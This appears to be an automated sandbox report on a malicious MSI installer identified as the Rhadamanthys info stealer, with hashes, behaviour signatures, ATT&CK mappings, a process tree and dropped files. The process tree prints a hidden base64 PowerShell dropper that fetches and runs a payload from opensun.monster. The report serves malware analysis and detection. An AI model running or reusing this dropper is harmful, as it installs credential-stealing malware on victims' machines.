Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-06-2024 13:36

General

  • Target

    setup.msi

  • Size

    25.2MB

  • MD5

    91cc342e3d4c2a0b3f5dcd1299e03d48

  • SHA1

    f907916082fb5ba69275209c4812dbd6ffb84a57

  • SHA256

    82de87cc81dd7f8de02840ecdeb0c0189d01cf8128867461f877276181a10dab

  • SHA512

    379c237282db87aa3fd55072d8af2a86fbe61340116027167154b4e901f05a3eef2f13b98e8037548dd1e90ee847b84c0fe217b88bfe8160841a2aa91df81f99

  • SSDEEP

    393216:w+mYUMfqQYO9meWrMl0VESIjWmsKGiQaUJGUjbEHEqAMNEI2osoy/A:w+YMfqQY7briMAtsKJUJGPJNa

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/25053.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 20 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2952
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1692
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4652
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 1B4B0693FE263F167C87261483ACC0C8
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:4104
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
        2⤵
        • Executes dropped EXE
        PID:3116
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:4944
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 2032
            4⤵
            • Program crash
            PID:2180
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 2028
            4⤵
            • Program crash
            PID:3572
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 2040
            4⤵
            • Program crash
            PID:2400
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4044 -ip 4044
      1⤵
        PID:4052
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4044 -ip 4044
        1⤵
          PID:3284
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4044 -ip 4044
          1⤵
            PID:3872

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e577fb2.rbs
            Filesize

            21KB

            MD5

            7a9c9fc3b6df3fe49af158558ed8c7e1

            SHA1

            ad2324dc44c537816a73bd6daab76436e2f2bfe9

            SHA256

            76a900ac145c2d58e71ce85a8b367f201a5fe5c8039435bcca9edf4973d47e1e

            SHA512

            d581117c82aaea236903d115d15c5155cb8432c4de5b0f030a059d896ff70f623fe97b60f9873d1c0b6b05bc34923c0bb8f7eacab9377e8648b6becf640169e2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rbqgvhfz.fo3.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar
            Filesize

            378KB

            MD5

            52390152dd51c47adb5d7dec74767636

            SHA1

            e10ec73964bdbbe5bb5af4e2d9fe6db1a9fb61ff

            SHA256

            6f7deab5453ac4fd1fa18ea59d4148734f7ddc09670dea771d513cf71eeca330

            SHA512

            1a164412a6a46d48c065f9add074d6ec0788431fe28277dc517097a8b043831de712d3f5881e84db1d84096969860f2604e7c438f48227b0ed9a63e6b78a7c70

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
            Filesize

            639KB

            MD5

            fd3ce044ac234fdab3df9d7f492c470a

            SHA1

            a74a287d5d82a8071ab36c72b2786342d83a8ef7

            SHA256

            0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba

            SHA512

            86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\tier0_s64.dll
            Filesize

            386KB

            MD5

            7e60404cfb232a1d3708a9892d020e84

            SHA1

            31328d887bee17641608252fb2f9cd6caf8ba522

            SHA256

            5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766

            SHA512

            4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

          • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\vstdlib_s64.dll
            Filesize

            1.0MB

            MD5

            a5ab8b78e8791bfdfab6c824e7e2da07

            SHA1

            7a61238784bee9ff827a9671506c02b71b3ca8da

            SHA256

            4a0baea9d986c07ff21d4d9a60fd9125ed8a2fd7ed45e927e41d8f4a5ea011e9

            SHA512

            c2892779a6e99b926ef21b6d068c97852e5c5781c06d0774a74e7b7f193239b19e84c2a492df637926b608e73ab2e08b355654a9b5fc482978dd8a8724bbe362

          • C:\Windows\Installer\MSI801D.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI8263.tmp
            Filesize

            1.1MB

            MD5

            1a2b237796742c26b11a008d0b175e29

            SHA1

            cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

            SHA256

            81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

            SHA512

            3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

          • C:\Windows\Installer\MSI9A72.tmp
            Filesize

            364KB

            MD5

            54d74546c6afe67b3d118c3c477c159a

            SHA1

            957f08beb7e27e657cd83d8ee50388b887935fae

            SHA256

            f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

            SHA512

            d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

          • C:\Windows\Installer\e577faf.msi
            Filesize

            25.2MB

            MD5

            91cc342e3d4c2a0b3f5dcd1299e03d48

            SHA1

            f907916082fb5ba69275209c4812dbd6ffb84a57

            SHA256

            82de87cc81dd7f8de02840ecdeb0c0189d01cf8128867461f877276181a10dab

            SHA512

            379c237282db87aa3fd55072d8af2a86fbe61340116027167154b4e901f05a3eef2f13b98e8037548dd1e90ee847b84c0fe217b88bfe8160841a2aa91df81f99

          • memory/1692-189-0x00000000007D0000-0x00000000007D9000-memory.dmp
            Filesize

            36KB

          • memory/1692-202-0x0000000075CF0000-0x0000000075F42000-memory.dmp
            Filesize

            2.3MB

          • memory/1692-198-0x0000000002640000-0x0000000002A40000-memory.dmp
            Filesize

            4.0MB

          • memory/1692-199-0x00007FFEE80A0000-0x00007FFEE82A9000-memory.dmp
            Filesize

            2.0MB

          • memory/3276-152-0x0000023029CC0000-0x0000023029CC1000-memory.dmp
            Filesize

            4KB

          • memory/3276-153-0x0000023029CD0000-0x0000023029CF5000-memory.dmp
            Filesize

            148KB

          • memory/4044-188-0x0000000075CF0000-0x0000000075F42000-memory.dmp
            Filesize

            2.3MB

          • memory/4044-179-0x0000000004DA0000-0x00000000051A0000-memory.dmp
            Filesize

            4.0MB

          • memory/4044-186-0x00007FFEE80A0000-0x00007FFEE82A9000-memory.dmp
            Filesize

            2.0MB

          • memory/4044-154-0x0000000000AA0000-0x0000000000AC8000-memory.dmp
            Filesize

            160KB

          • memory/4044-185-0x0000000004DA0000-0x00000000051A0000-memory.dmp
            Filesize

            4.0MB

          • memory/4044-156-0x0000000000AA0000-0x0000000000AC8000-memory.dmp
            Filesize

            160KB

          • memory/4044-155-0x0000000000AA0000-0x0000000000AC8000-memory.dmp
            Filesize

            160KB

          • memory/4044-216-0x0000000000BA0000-0x0000000000BB1000-memory.dmp
            Filesize

            68KB

          • memory/4944-178-0x000001C232150000-0x000001C23216C000-memory.dmp
            Filesize

            112KB

          • memory/4944-166-0x000001C231B00000-0x000001C231B22000-memory.dmp
            Filesize

            136KB

          • memory/4944-214-0x000001C232340000-0x000001C232502000-memory.dmp
            Filesize

            1.8MB

          • memory/4944-215-0x000001C232A40000-0x000001C232F68000-memory.dmp
            Filesize

            5.2MB